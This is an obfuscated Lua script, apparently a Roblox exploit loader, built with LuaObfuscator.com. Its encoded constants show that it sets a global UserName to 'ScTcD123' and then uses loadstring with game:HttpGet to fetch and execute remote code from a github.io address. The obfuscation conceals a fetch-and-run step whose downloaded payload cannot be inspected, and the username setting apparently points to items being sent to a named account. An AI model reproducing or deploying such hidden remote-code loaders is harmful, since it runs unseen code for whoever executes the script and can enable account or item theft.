--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v75=v5(v68,v19);v19=nil;return v75;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((3 -1)^(v32-1)))%((3 -1)^(((v33-(2 -(1 -0))) -(v32-(328 -(294 + 33)))) + 1 + 0)) ;return v69-(v69%1) ;else local v70=0;local v71;while true do if ((0 -(1641 -(181 + 1460)))==v70) then v71=(1880 -(1183 + 695))^(v32-(1041 -(321 + 719))) ;return (((v31%(v71 + v71))>=v71) and (1 -0)) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v36 * (1170 -914)) + v35 ;end local function v23()local v37=0 + (1163 -(367 + 796)) ;local v38;local v39;local v40;local v41;while true do if ((0 + 0)==v37) then v38,v39,v40,v41=v1(v16,v18,v18 + (5 -(2 + 0)) );v18=v18 + (5 -1) ;v37=1726 -(960 + 765) ;end if (v37==1) then return (v41 * ((32762348 -8387486) -7597646)) + (v40 * (66502 -(217 + 749))) + (v39 * (100 + 106 + 50)) + v38 ;end end end local function v24()local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,1 + 0 ,20) * ((2 + 0)^(983 -(929 + 22)))) + v42 ;local v46=v20(v43,104 -83 ,31);local v47=((v20(v43,1090 -(812 + 246) )==(364 -(338 + (84 -59)))) and  -(3 -2)) or (1 + 0) ;if (v46==(529 -(399 + 130))) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=1 -0 ;v44=0 -0 ;end elseif (v46==(185 + 1862)) then return ((v45==(0 + 0)) and (v47 * ((2 -1)/((524 -(318 + 206)) -0)))) or (v47 * NaN) ;end return v8(v47,v46-(3374 -(5978 -3627)) ) * (v44 + (v45/((2 -0)^(40 + (1366 -(630 + 724)))))) ;end local function v25(v48)local v49=(2135 -(519 + 583)) -(70 + 963) ;local v50;local v51;while true do if (v49==(1755 -(1181 + 571))) then return v6(v51);end if ((0 -0)==v49) then v50=nil;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=1380 -(716 + 663) ;end if (v49==(1 + 1)) then v51={};for v76=1, #v50 do v51[v76]=v2(v1(v3(v50,v76,v76)));end v49=3;end if ((1345 -(657 + 292 + 395))==v49) then v50=v3(v16,v18,(v18 + v48) -((307 -(124 + 181)) -1) );v18=v18 + v48 ;v49=2;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=(3 -1)) then else v57=nil;v58=nil;v52=1 + 2 ;end if (v52==0) then v53=0;v54=nil;v52=1;end if (v52~=(12 -9)) then else v59=nil;v60=nil;v52=4;end if (v52==1) then v55=nil;v56=nil;v52=2;end if (v52==4) then while true do if (v53==2) then v58=nil;v59=nil;v53=3;end if (v53~=(2 -1)) then else local v93=0 -0 ;while true do if (v93==(0 + 0)) then v56=nil;v57=nil;v93=1;end if (v93~=1) then else v53=2;break;end end end if (v53~=0) then else local v94=0;while true do if (0==v94) then v54=0;v55=nil;v94=1 + 0 ;end if (v94==(1893 -(1237 + 655))) then v53=1993 -(908 + 1084) ;break;end end end if (v53~=(8 -5)) then else v60=nil;while true do local v101=0;local v102;while true do if (v101==(1541 -(215 + 1326))) then v102=0;while true do if (v102==(96 -(82 + 14))) then local v107=0;local v108;while true do if (v107==0) then v108=0;while true do if (v108~=(1 -0)) then else v102=1 -0 ;break;end if (v108==(0 + 0)) then if (v54==1) then local v114=0 + 0 ;while true do if (v114==(3 -2)) then local v142=0;local v143;while true do if (v142~=0) then else v143=0;while true do if (v143~=(1367 -(1330 + 36))) then else v114=2;break;end if (v143~=(1163 -(313 + 850))) then else for v163=1,v59 do local v164=0;local v165;local v166;local v167;while true do if ((1 + 0)~=v164) then else v167=nil;while true do if (v165==1) then if (v166==1) then v167=v21()~=(0 -0) ;elseif (v166==(7 -5)) then v167=v24();elseif (v166==3) then v167=v25();end v60[v163]=v167;break;end if (v165~=(0 + 0)) then else local v179=0 + 0 ;while true do if (v179~=(872 -(780 + 91))) then else v165=1;break;end if (v179==(0 + 0)) then v166=v21();v167=nil;v179=1 -0 ;end end end end break;end if (v164==(0 -0)) then v165=0;v166=nil;v164=1;end end end v58[3 -0 ]=v21();v143=1 + 0 ;end end break;end end end if (v114==2) then v54=2;break;end if (v114==0) then local v144=0 -0 ;while true do if (v144~=1) then else v114=1 + 0 ;break;end if (v144==(1161 -(879 + 282))) then v59=v23();v60={};v144=1;end end end end end if (v54~=2) then else local v115=1260 -(1004 + 256) ;local v116;local v117;while true do if (v115==(0 + 0)) then v116=0;v117=nil;v115=2 -1 ;end if (v115~=(1095 -(708 + 386))) then else while true do if (v116==0) then v117=0;while true do local v154=0;while true do if (v154==0) then if (0~=v117) then else local v171=0;while true do if (v171==(0 + 0)) then local v176=0;while true do if (v176==(1949 -(115 + 1834))) then for v182=1,v23() do local v183=0 -0 ;local v184;local v185;local v186;while true do if (v183==(1252 -(224 + 1027))) then v186=nil;while true do if (v184~=0) then else v185=0 -0 ;v186=nil;v184=1 -0 ;end if (1==v184) then while true do if (v185==(0 + 0)) then v186=v21();if (v20(v186,1 -0 ,1)==0) then local v189=527 -(91 + 436) ;local v190;local v191;local v192;local v193;while true do if (2==v189) then while true do if (v190~=1) then else local v196=0 -0 ;local v197;while true do if (v196~=0) then else v197=0;while true do if (v197==(0 -0)) then v193={v22(),v22(),nil,nil};if (v191==(0 -0)) then local v207=0;local v208;local v209;local v210;while true do if (v207==(0 + 0)) then v208=0 + 0 ;v209=nil;v207=1442 -(855 + 586) ;end if (v207==(1 + 0)) then v210=nil;while true do if (v208~=(0 -0)) then else local v218=0;while true do if (v218==0) then v209=0;v210=nil;v218=1;end if (v218~=(3 -2)) then else v208=1963 -(1284 + 678) ;break;end end end if (v208==(1 + 0)) then while true do if (v209~=(1416 -(710 + 706))) then else v210=1248 -(819 + 429) ;while true do if (v210==(0 + 0)) then v193[4 -1 ]=v22();v193[7 -3 ]=v22();break;end end break;end end break;end end break;end end elseif (v191==1) then v193[4 -1 ]=v23();elseif (v191==2) then v193[2 + 1 ]=v23() -((704 -(378 + 324))^(1146 -(882 + 248))) ;elseif (v191==3) then local v219=0 -0 ;local v220;while true do if (v219~=0) then else v220=678 -(333 + 345) ;while true do if (v220==0) then v193[1241 -(780 + 458) ]=v23() -(2^16) ;v193[4]=v22();break;end end break;end end end v197=1;end if (v197==1) then v190=2;break;end end break;end end end if (v190==(0 -0)) then local v198=0;local v199;while true do if (v198~=(0 -0)) then else v199=0;while true do if (v199==(0 + 0)) then local v206=0;while true do if (v206==1) then v199=1 + 0 ;break;end if (v206~=(1651 -(1464 + 187))) then else local v211=0 + 0 ;while true do if (1~=v211) then else v206=1 + 0 ;break;end if (v211==0) then v191=v20(v186,1 + 1 ,14 -11 );v192=v20(v186,4,10 -4 );v211=1;end end end end end if (v199~=(1 + 0)) then else v190=1;break;end end break;end end end if (3==v190) then if (v20(v192,1174 -(163 + 1008) ,305 -(135 + 167) )==1) then v193[4]=v60[v193[4]];end v55[v182]=v193;break;end if (v190==2) then local v201=1198 -(576 + 622) ;while true do if (v201==(676 -(122 + 553))) then v190=5 -2 ;break;end if ((0 + 0)==v201) then local v204=0;local v205;while true do if (v204==0) then v205=0 + 0 ;while true do if (v205~=(0 + 0)) then else if (v20(v192,457 -(434 + 22) ,451 -(421 + 29) )==(1 + 0)) then v193[2]=v60[v193[2]];end if (v20(v192,2,2)~=(3 -2)) then else v193[3 + 0 ]=v60[v193[3]];end v205=1;end if (v205==1) then v201=1 + 0 ;break;end end break;end end end end end end break;end if (v189==(1240 -(33 + 1207))) then local v194=0 -0 ;while true do if ((0 + 0)==v194) then v190=0;v191=nil;v194=1;end if (v194~=1) then else v189=1;break;end end end if (v189==(1 + 0)) then local v195=0 + 0 ;while true do if (1==v195) then v189=6 -4 ;break;end if (v195==(0 -0)) then v192=nil;v193=nil;v195=1844 -(617 + 1226) ;end end end end end break;end end break;end end break;end if (v183==(1263 -(1128 + 135))) then v184=0;v185=nil;v183=1;end end end for v187=1 + 0 ,v23() do v56[v187-(1 + 0) ]=v28();end v176=1896 -(1059 + 836) ;end if ((944 -(499 + 444))==v176) then v171=1 + 0 ;break;end end end if (v171==(1 + 0)) then v117=1;break;end end end if ((3 -2)==v117) then local v172=0 + 0 ;while true do if ((1586 -(1301 + 285))==v172) then for v180=1937 -(804 + 1132) ,v23() do v57[v180]=v23();end return v58;end end end break;end end end break;end end break;end end end v108=1;end end break;end end end if (v102~=(1 + 0)) then else if (v54==0) then local v109=0;local v110;local v111;while true do if ((77 -(24 + 52))==v109) then while true do if (v110==0) then v111=0;while true do if (v111~=(4 -3)) then else local v145=0;while true do if (v145~=(0 + 0)) then else v57={};v58={v55,v56,nil,v57};v145=1;end if (1~=v145) then else v111=2;break;end end end if (v111~=2) then else v54=3 -2 ;break;end if (v111==0) then local v146=0;while true do if (v146==(573 -(99 + 473))) then v111=1;break;end if (v146==(0 -0)) then v55={};v56={};v146=1;end end end end break;end end break;end if (v109==(0 + 0)) then v110=0 + 0 ;v111=nil;v109=1 + 0 ;end end end break;end end break;end end end break;end end break;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1 ;local function v82()local v83=v65;local v84=v66;local v85=v67;local v86=v27;local v87={};local v88={};local v89={};for v95=1271 -(90 + 572 + (2875 -2266)) ,v81 do if (((3920 -(175 + 120))<=(5582 -(524 + 810))) and (v95>=v85)) then v87[v95-v85 ]=v80[v95 + (3 -2) ];else v89[v95]=v80[v95 + (659 -(125 + 533)) ];end end local v90=(v81-v85) + 1 + 0 ;local v91;local v92;while true do local v96=0 -0 ;local v97;local v98;while true do if (((3769 -(113 + 191))>(5307 -3482)) and ((0 -0)==v96)) then v97=0;v98=nil;v96=1;end if (((5638 -(553 + 410))>=(2291 -1457)) and (v96==(2 -1))) then while true do if (((2821 -892)>=(1415 -(191 + 229))) and (v97==(0 -0))) then v98=0;while true do if (((7349 -(259 + 5084))<((1672 -825) + 2017)) and (v98==(0 + 0))) then local v112=394 -(359 + (1538 -(1413 + 90))) ;while true do if ((v112==1) or ((2868 + 114)<=535)) then v98=2 -1 ;break;end if ((v112==(1219 -(808 + 411))) or ((6964 -3430)==2520)) then local v113=443 -(426 + (1921 -(1333 + 571))) ;while true do if (((1415 + 447)<(4093 -(226 + 1534))) and (v113==(0 -0))) then v91=v83[v78];v92=v91[917 -(49 + 867) ];v113=1 + 0 ;end if (((2062 -990)==(1678 -(273 + 270 + 63))) and ((959 -(252 + 706))==v113)) then v112=2 -1 ;break;end end end end end if ((v98==(2 -1)) or ((6272 -(1025 + 865))<=(541 + 466))) then if ((407==(623 -216)) and (v92<=(1111 -(1001 + 105)))) then if ((v92<=((1959 -(1393 + 564)) + (1112 -(215 + 897)))) or ((287 + 3137)<=1332)) then if ((v92<=(0 + 0 + 0)) or ((10882 -7591)==(3562 -(892 + 42 + 716)))) then for v128=v91[2 + 0 ],v91[(3 -2) + 2 ] do v89[v128]=nil;end elseif ((v92>(1 + 0)) or ((3393 -(1654 + 63))>(3841 -(1433 + 271)))) then v89[v91[(4211 -2381) -(290 + 1538) ]]=v63[v91[2 + 1 ]];else do return;end end elseif (((142 + 283)>(772 -(234 + 164))) and (v92<=(1364 -(15 + 1346)))) then v89[v91[2]]();elseif ((v92==((193 -121) -(30 + 38))) or (3139<(1060 -690))) then v89[v91[1 + 1 ]]=v91[587 -(281 + 303) ];else local v134=0 + 0 ;local v135;while true do if (((7495 -4881)>=(3951 -1523)) and (v134==0)) then v135=v91[2 + 0 ];v89[v135]=v89[v135](v13(v89,v135 + (98 -(77 + 20)) ,v79));break;end end end elseif (((4127 -(152 + 624))<=(13434 -8707)) and (v92<=(1649 -(1201 + 440)))) then if (((1084 + 1809)>=95) and (v92<=6)) then local v120=0 + 0 + 0 ;local v121;local v122;local v123;local v124;local v125;while true do if ((308==(147 + 161)) and (v120==(1 + (2 -1)))) then v125=nil;while true do if ((v121==(896 -(429 + (1799 -(480 + 854))))) or ((2567 + 703)==(6448 -4471))) then for v155=v122,v79 do local v156=1888 -(1043 + 845) ;while true do if ((v156==(0 + 0)) or ((1240 + 183)>=(1170 + 3689))) then v125=v125 + 1 + 0 ;v89[v155]=v123[v125];break;end end end break;end if ((v121==1) or ((4618 -(48 + 366))<=((18699 -(258 + 234)) -14089))) then local v151=0 -0 ;while true do if (((4247 -2817)<=(2564 + 1293)) and (v151==(0 -0))) then local v162=175 -(45 + 130) ;while true do if ((((1515 -(143 + 465)) + 495)==1402) and (v162==(0 -0))) then v79=(v124 + v122) -1 ;v125=1567 -(57 + 1510) ;v162=1 + 0 + 0 ;end if ((v162==((955 -536) -(91 + 327))) or ((4195 -(871 + 116))<(1795 -(26 + 571)))) then v151=1619 -(323 + 1295) ;break;end end end if (((18071 -(8927 + 4807))>(10202 -6626)) and (v151==(1 + 0))) then v121=5 -3 ;break;end end end if (((1287 -(355 + 877))==(209 -(77 + 77))) and (v121==(0 -(943 -(224 + 719))))) then local v152=0 -0 ;local v153;while true do if (((5264 -2559)>=(1252 -(396 + 359))) and (v152==(342 -(196 + 146)))) then v153=176 -(13 + 22 + 141) ;while true do if ((2680>(900 -(219 + 488))) and (v153==(643 -(106 + 537)))) then local v173=0;while true do if ((((863 + 3111) -2634)>=(1050 -(244 + 12))) and (v173==(1799 -(536 + 1262)))) then v153=1 -0 ;break;end if ((v173==((2241 -(488 + 78)) -(1019 + 656))) or ((6132 -3803)<=(5702 -3679))) then v122=v91[(105 -(24 + 79)) + (0 -0) ];v123,v124=v86(v89[v122](v13(v89,v122 + 1 + 0 ,v91[2 + 1 ])));v173=2 -1 ;end end end if ((v153==(1 + 0)) or (2064<745)) then v121=1 + 0 ;break;end end break;end end end end break;end if ((4414==(5202 -(741 + 47))) and (v120==(1291 -((3191 -2323) + 422)))) then v123=nil;v124=nil;v120=(1316 + 671) -(1696 + 289) ;end if ((v120==0) or ((596 + 361)<(1180 -(270 + 245 + 160)))) then v121=0;v122=nil;v120=(2 -1) + 0 ;end end elseif ((v92>(23 -16)) or ((2392 -(65 + 1171))>=(6066 -2592))) then if ((v89[v91[1 + 1 ]]==v91[48 -(41 + (1015 -(572 + 440))) ]) or ((778 + 321)>=4472)) then v78=v78 + (1 -0) ;else v78=v91[3 + 0 ];end else v78=v91[505 -(220 + 282) ];end elseif (((3037 + 152)>=((23373 -15204) -6161)) and (v92<=(18 -(20 -11)))) then v63[v91[405 -(370 + 32) ]]=v89[v91[709 -(298 + 409) ]];elseif (((7665 -5895)>(158 + (1210 -(337 + 758)))) and (v92>(537 -(80 + 447)))) then v89[v91[(832 -(177 + 649)) -(3 + 1) ]]=v91[1 + 2 ]~=0 ;else local v138=0 -0 ;local v139;local v140;local v141;while true do if ((v138==(0 + 0)) or ((3930 + 617)<(1780 -714))) then local v150=488 -(156 + 332) ;while true do if ((v150==(0 + 0)) or ((686 -(42 + 68))>=(2060 + 252 + 1182))) then v139=0 -(898 -(82 + 816)) ;v140=nil;v150=1490 -(863 + 626) ;end if ((v150==(1 + 0)) or ((2514 + 777)>=(215 + 3678))) then v138=1 + 0 ;break;end end end if (((1605 -(362 + (793 -609)))>((2957 -2194) -280)) and (v138==(1 + (0 -0)))) then v141=nil;while true do if (((181 + 1188 + 129)<(6627 -(1042 + (2625 -1712)))) and (v139==(70 -(4 + 65)))) then v89[v140 + (3 -2) ]=v141;v89[v140]=v141[v91[5 -1 ]];break;end if ((2447>(1165 -(38 + 979))) and ((1982 -(705 + 1277))==v139)) then local v160=0 + 0 + 0 ;while true do if ((v160==1) or ((216 -(77 + 56))>=((4199 + 3904) -5873))) then v139=42 -(33 + 8) ;break;end if ((((1563 -832) + 1127)>144) and ((271 -(16 + 255))==v160)) then local v170=1137 -(432 + 705) ;while true do if ((v170==((0 -0) + 0)) or (3893<363)) then v140=v91[2];v141=v89[v91[13 -10 ]];v170=1 + 0 ;end if (((3331 + 1345)>=(44 + 68)) and (v170==(2 -1))) then v160=1 + 0 ;break;end end end end end end break;end end end v78=v78 + 1 + 0 ;break;end end break;end end break;end end end end A,B=v27(v11(v82));if  not A[1] then local v99=0;local v100;while true do if (v99==0) then v100=v61[4][v78] or "?" ;error("Script error at ["   .. v100   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end if (0==v64) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365724E616D6503083O005363546344313233030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403273O00682O7470733A2O2F707378392E6769746875622E696F2F736372697074732F4D61696E2E6C756100163O0012043O00016O000100013O0026083O0002000100010004073O00020001001204000100013O00260800010005000100010004073O00050001001204000200033O001209000200023O001202000200043O001202000300053O00200A000300030006001204000500074O000B000600014O0006000300064O000500023O00022O00030002000100010004073O001500010004073O000500010004073O001500010004073O000200012O00013O00017O00163O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
